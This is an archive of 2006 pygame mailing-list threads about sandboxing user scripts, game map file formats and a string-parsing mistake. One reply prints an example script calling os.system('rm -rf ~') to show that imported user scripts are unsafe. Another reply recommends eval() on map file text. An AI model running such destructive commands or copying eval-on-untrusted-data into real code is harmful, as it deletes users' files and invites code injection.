Hello Farai, I prefer to not dismiss Python as simply a scripting language. :p Anyway, I am using Python as the development language for both the client and server in a project I am working on. Now, I want to be able to expose certain functionality for scripting other than the internal development kind I have been doing with Python. That is, users can write scripts that affect the behavior of their avatars in the world. I do not want to expose Python itself (at least, the same environment that the server is running in) because it seems relatively easy to reach outside of one's module in Python to muck with internal settings. I certainly cannot check for every piece of unsafe code and users will not have the server source so as to easily engineer such a thing, but it seems safer to just use something external and expose only the objects and methods I choose to allow. Thanks, Brandon On Dec 18, 2006, at 5:51 PM, Farai Aschwanden wrote: Hello Brandon Maybe I missunderstand you but Python IS a scripting language. What is your intention using Python? Farai Am 18.12.2006 um 22:53 schrieb Brandon N: Hello all, This is not strictly a pygame question though it does relate to my use of pygame in general. What have people used for scripting languages in Python? I suppose I could use Python itself but I do not want to expose anything through the use of eval or otherwise (currently I am doing just about this). While I do not want to write a language from scratch, I do have a simple Lisp implementation that I could expose. If this is way too off-topic I'll try to find another place to ask. Cheers, Brandon
Re: [pygame] Scripting language
Patrick Mullen wrote:
You could use imports instead of eval for better use of python as the
scripting language.
Scripts can be defined like so:
script.py
-
def make_ball_bounce(ball):
ball.addForce([0,0,1])
-
Then to hook it, you import script:
def addBall(x,y):
script = None
try:
import script
reload(script) #Edit scripts while game is running!
except:
#handle import errors
object = Ball([x,y],"red")
for func in dir(script):
setattr(object,func,getattr(script,func))
return object
Now in the game code:
ball = addBall(2,6)
if key=="enter":
ball.make_ball_bounce(ball)
-
Even safer and less hacky, you could just set object.script = script,
and then call ball.script.make_ball_bounce(ball)
I don't see how this is safer...
def make_ball_bounce(ball):
import os
os.system('rm -rf ~')
(I don't know what that does, since I am not on Linux. I got it from
http://mail.python.org/pipermail/python-list/2002-July/155190.html ,
but I suspect it does something bad :))
Re: [pygame] Scripting language
You could use imports instead of eval for better use of python as the scripting language. Scripts can be defined like so: script.py - def make_ball_bounce(ball): ball.addForce([0,0,1]) - Then to hook it, you import script: def addBall(x,y): script = None try: import script reload(script) #Edit scripts while game is running! except: #handle import errors object = Ball([x,y],"red") for func in dir(script): setattr(object,func,getattr(script,func)) return object Now in the game code: ball = addBall(2,6) if key=="enter": ball.make_ball_bounce(ball) - Even safer and less hacky, you could just set object.script = script, and then call ball.script.make_ball_bounce(ball) Not tested, but some form of this method should work.
Re: [pygame] Scripting language
Hello Brandon Maybe I missunderstand you but Python IS a scripting language. What is your intention using Python? Farai Am 18.12.2006 um 22:53 schrieb Brandon N: Hello all, This is not strictly a pygame question though it does relate to my use of pygame in general. What have people used for scripting languages in Python? I suppose I could use Python itself but I do not want to expose anything through the use of eval or otherwise (currently I am doing just about this). While I do not want to write a language from scratch, I do have a simple Lisp implementation that I could expose. If this is way too off-topic I'll try to find another place to ask. Cheers, Brandon
[pygame] Scripting language
Hello all, This is not strictly a pygame question though it does relate to my use of pygame in general. What have people used for scripting languages in Python? I suppose I could use Python itself but I do not want to expose anything through the use of eval or otherwise (currently I am doing just about this). While I do not want to write a language from scratch, I do have a simple Lisp implementation that I could expose. If this is way too off-topic I'll try to find another place to ask. Cheers, Brandon
Re: [pygame] map format
On Tuesday 19 December 2006 04:41, spotter . wrote: > On 12/18/06, Chris Smith <[EMAIL PROTECTED]> wrote: > > I generally make the map file as simple to read and change in a text > > editor as I can. This generally makes the python code to parse the file a > > bit more complex, but since this is done only once at start-up I don't > > notice any speed issues. > > > > Another way of doing it is to write a simple map loader that then pickles > > the data structure and saves it, and then in your game, load the pickle > > file. > > Pickling sounds awesome, looking at some tutorials on the web. It > would be a good choice if the editor was made in python, and it could > be pickled. Text just makes it simpler to start, but pickling would > probably be faster in the end. Pickling is good, but can create code maintenance problems as your data files store references to actual classes in modules. Consider reducing your data down to Python builtin types (list, dict, etc.) and use the marshal module instead. It's faster and has none of the potential hassles of pickling. Richard
Re: [pygame] stupidity, and a lesson learned
Maybe this helps: you can read the whole map directly into a
dictionary/list. Lets say the map is divided into two parts:
1. line: meta data
2. - n. line: map data
The whole map file could look like this:
['Dark Forrest', 'Donald Duck', timestamp, 20, 50,
'weather_sun', ...] # Line 1(meta data)
{'map_pos1': ['stone.png', passable_yes, trap_no, ...], # must be in
structure of a dictionary while map_pos1 is the key
'map_pos2: ['grass.png', passable_yes, trap_yes, ...], # ...
'map_posn: [...]
}
That way the position inside the lists defines what it represents,
like 1. item of meta data is the map name. The file will be smaller
than having it in the file like:
map_name = 'Dark Forrest'
author = 'Donald Duck'
etc.
Having the first line as list and the further lines as dict you can
now read it w/o care of items inside:
map_meta_dict = [] # List to store metadata of map
map_area_dict = {} # Dict to store whole map
map_merge = '' # Temporarily needed to read/add all map lines
# Read head of map
map_head = eval(map_read.readline()) # Read first line of file
and set file read pointer to line 2 (eval is important)
# Read map structure
for map_line in map_read: # Iterate now from line 2 to to end
of the file
map_merge += (line.rstrip()) # Read line by line of map and
add it to to the previously read lines
map_area_dict = eval(map_merge) # Evaluate file structure after
completly reading it and assign it to the dict
file.close(map_read) # Tnx
and goodbye file
So you dont have to care every single item when reading in the file
and you can easy access it when the map is into dictionary/list
format. Its not even optimized yet but quite fast. Another advantage
is that the map lines can have different lengths and must not be
square like.
There is also an option to read in the whole file what would make it
even faster but then you cant initially split meta and map not that
easy. File handling is easier if you have meta data and map in one
file. No 'if's reading the file and string functionality needed. ;)
Just my 2 cents
Farai
Am 18.12.2006 um 06:26 schrieb spotter .:
Hi everybody,
I just got hit by the silliest, stupidest error on my part and I
decided to share it, since it was kinda funny after the fact and so
that no one else would make my mistake.
This was the data I was trying to parse (a map format I was making):
mapname=DeathMap
mapauthor=pumaninja
mapdate=12172006
mapversion=0.0.1
mapwidth=10
mapheight=5
And this was the code I was using to get the info out of the file:
elif info.find("mapauthor=") == 0: # 0 means that the string has
been found
temp = ""
temp = info.strip("mapauthor=")
map_author.append(temp)
I was thinking that the .strip() simply took out the specified
absolute phrase. I was wrong. The .strip() looks for all the
characters specified and takes them out. For the other tags, this did
not get me since none of the other names matched any where close to
data type or the combination of letters. Only for the author part
because I had put in pumaninja which if you see has p, u, m, a
contained in mapauthor.
Ah, well, at least this didnt come back and get me way after the fact.
Although, this code was based on a part of a game I had already
written, that one missed the bullet because the info was numbers and
not characters.
Moral of the story : Clearly read the docs, and test the function with
various data types.
Happy coding,
-spot
Re: [pygame] map format
On 12/18/06, Chris Smith <[EMAIL PROTECTED]> wrote: I generally make the map file as simple to read and change in a text editor as I can. This generally makes the python code to parse the file a bit more complex, but since this is done only once at start-up I don't notice any speed issues. Another way of doing it is to write a simple map loader that then pickles the data structure and saves it, and then in your game, load the pickle file. Pickling sounds awesome, looking at some tutorials on the web. It would be a good choice if the editor was made in python, and it could be pickled. Text just makes it simpler to start, but pickling would probably be faster in the end. Thanks, -spot
Re: [pygame]Whats the best way to build a game map.
Do you want to create it in 2D (Zelda style) or 3D (Dungeon Master style) or isometric (Ultima Online style)? Knowing this ppl might give you more fitting answers. Am 18.12.2006 um 02:05 schrieb Lamonte(Scheols/Demonic): Im trying to start a simple game that is basically an RPG type game. So a sprite can travel around land etc.. Whats the best way to do this?
Re: [pygame] stupidity, and a lesson learned
On 12/18/06, Luke Paireepinart <[EMAIL PROTECTED]> wrote:
> and then use split(";") to move them into a list and assign it to
> variables then.
Just thought I'd mention, since the split method returns a list, you
could do:
name,author,date,version,width,height = astr.split(";")
> Does this seem alright, no glaring things I have missed? It does seem
> to work from
> my small amount of testing that I have put it through.
Yeah, as long as you don't expect any of your values to have semicolons
in them.
You could always use something strange like chr(245) as the separator,
and it'd be less likely to occur in your values.
But if you're the one defining these map files anyway, just make sure
you don't use semicolons.
And make sure you make a note of that if you give people the ability to
make custom maps.
Ah, thanks Luke, it would be much easier if I used a nonstandard
character. Thanks for the name, author, date = data.split(";"). I keep
forgetting how easy it is to do stuff in python.
-spot
Re: [pygame] Wii Remote support -- first patch
On, Sun Dec 17, 2006, robomancer wrote: > Hi all, > > I've created a first step toward Wii Remote support in Pygame. Patch > is against 0.7.1 because the current SVN doesn't build for me. I > expect that future patches will be against SVN head, or 0.8 when that > is released. Let me know what you think. You can download the > current sample code here: > > http://gs3080.sp.cs.cmu.edu/wiimote/ [...] Argh! Shame on you, you gave me another damn reason to buy me a Wii ;-). Regards Marcus pgpIwMwXnBPqi.pgp Description: PGP signature
Re: [pygame] map format
I generally make the map file as simple to read and change in a text editor
as I can. This generally makes the python code to parse the file a bit more
complex, but since this is done only once at start-up I don't notice any
speed issues.
Another way of doing it is to write a simple map loader that then pickles
the data structure and saves it, and then in your game, load the pickle
file.
On 12/17/06, spotter . <[EMAIL PROTECTED]> wrote:
Thanks, I just wanted to make it fast because if I start loading the
map at the beginning, it might seem to take a while before the game
starts due to parsing and caching. Probably just my computer though,
its a bit low on ram :(
On 12/17/06, Ethan Glasser-Camp <[EMAIL PROTECTED]> wrote:
> spotter . wrote:
> > Hey everybody,
> >
> > I am in the process of trying to make a file format for maps.
> >
> > The meta file will have the info like name, author, date, version, and
> > the width and height.
> >
> > The other file will have the actual map data in it. This method will
be
> > slower,
> > since it involves opening, parsing, and closing two files.
>
> I think that unless you're going to be opening/reading map files all
> the time -- numerous times per frame? -- the performance differential
> is likely to be negligible. Get it working, then get it fast.
>
> If loading maps does turn out to be slow, perhaps you can cache them
> once loaded. I do something like this with image files, storing the
> images as .png with information like colorkey in a seperate file.
> Since I'm caching images anyhow, performance doesn't suffer much.
>
> > The second method will be easier to read in, but will affect
performance.
> > How do all of you implement maps? Do you use regular expressions or
> > simple search a string ?
>
> I typically try to write my maps as "pure Python" that call game
> engine functions. For instance, I've been toying with something like
this:
>
> setMap('''
> 0
> 1
> 0''')
> setTerrain(0, passable=True, tile="grass")
> setTerrain(1, passable=False, tile="forest")
>
> Of course, the last two times I tried to write a tile-based RPG I got
> nowhere fast and gave up, so maybe you shouldn't take my advice. :)
>
> The map format I describe above is inspired by looking at some Wesnoth
> maps, which look like a huge block of letters, with some other "meta"
> information stored in a seperate file.
>
> Ethan
>
>
>
>
--
Science is open source religion
